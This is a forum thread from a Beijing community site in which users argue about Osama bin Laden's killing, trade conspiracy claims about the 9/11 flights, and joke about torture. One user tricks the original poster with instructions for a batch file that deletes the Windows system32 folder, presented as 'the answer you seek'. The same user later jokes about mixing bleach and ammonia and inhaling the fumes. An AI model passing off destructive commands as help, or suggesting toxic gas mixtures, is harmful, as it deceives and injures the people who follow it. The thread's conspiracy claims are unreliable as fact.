Discussion » Current Events » Mystery Over Osama BL

• High Priest
    High Priest wrote:
    <p>As much as we've talked about the death of Bin Laden, there's still something lingering my mind.&nbsp; The myth about this man, OBL.</p> <p>I've heard this man was unarmed, wasn't this&nbsp;a chance for the US to get him alive and bring him to justice? I can't still figure out why&nbsp; he got killed&nbsp; in that condtion while he had much to offer over more secrets he has. I bet using waterboarding could let him&nbsp;leak more of those secrets that could help track his network.</p> <p>The mystery will remain as Michael Moore stated, we still can't know why, on 09/11, a plane was chattered by the Bush Admin, full of Osama's family members and the King&nbsp; of SA...</p> <p>His Killing seems to me uncivilized,&nbsp;coz anyone accused of wrong doing should stand trial and sentenced, be it Osama,&nbsp; Karl Kraus, Kaddafi or Bush..I've heard the US is place of fairness with the best justice in the world?</p> <p>&nbsp;Please help me</p>
  • 随便叫兽
    随便叫兽 wrote:

open Notepad (In the Accessories folder of the Windows Start menu)

Copy and paste the following:

@echo off
    del c:\WINDOWS\system32

Save As nvrforget.bat.txt

Double-click nvrforget.bat.txt .The answer you seek is inside that file.

• High Priest
    High Priest wrote:

Thanks Dando, let me try it

• Stine Ekren
  • 随便叫兽
    随便叫兽 wrote:

I hope nobody else followed my "advice" for HP.

• Stine Ekren
    Stine Ekren wrote:

hehe,system32...

• Simen Wangberg

"Thanks Dando, let me try it"

Hasn't posted anything since.

:-O

:-D

On one hand, I feel like most folks around here aren't computer-literate enough to realize what happens when you follow those instructions.

On the other hand, I feel like most folks around here aren't computer-literate enough to be able to follow those instructions. So.

• Ejdnzlaj
    Ejdnzlaj wrote:

Yeah, I think if you are able to carry it out, you'll be able to figure out what it does.

• 随便叫兽
    随便叫兽 wrote:

I think my instructions were incorrect anyway. It should be nvrforget.bat, not nvrforget.bat.txt

Oh well.

If he comes back in a week accusing me of hacking him, let's tell him that he can protect himself from U.S. government mind control and computer hacking by mixing bleach and ammonia in a bucket and inhaling deeply.

• Simen Wangberg

Well shit, that's actually the part that I thought most folks would have trouble with. So much for hax0ring anyone's computr0ns.

• 雪地
    雪地 wrote:

"the answer you seek is inside that file." ... dando, i want to know the truth as well, but it just doesnt work, i only ger "bash: del: command not found" ... ;-)

• High Priest
    High Priest wrote:

It didn't work for me too. Got some virus while trying to open it Dando.

Nway, Robert, the same way that the world is better off without him, this same word is better off without Bush.

I mean, the guy unarmed, he should be arrested and he should have given more clues on his network. But since they killed him, it clearely gives a message that he did what he did with the complicity of some powerful US governments members. So it was better to kill him, not to embarras them...

• Stine Ekren
    Stine Ekren wrote:

I would torture him instead of killing him so easily and comfortably...lol...

• High Priest
    High Priest wrote:

@RP, how do can u prove that it's not a conspiracy? I'm sorry I couldn't read Dando's doc he suggested.

What's ur idea on the chattered airplane in which his family members and those of the King of SA too off from the US to SA while no other place couldn't fly? Nothing has been clarified over those allegations

• High Priest
    High Priest wrote:

But the shadow left behind his death proves it. MM might not totally true, but there's logic in things he tells. People should prove him wrong with proof

• 随便叫兽
    随便叫兽 wrote:

• Simen Wangberg

Wo cao. Gillian was my first crush, I'm pretty sure. If you don't count the human form of Ariel from The Little Mermaid. And the pink power ranger.

Please login to post a reply to this thread.

WeLiveInBeijing

WeLiveInBeijing.com is a social community for people living in or traveling to Beijing.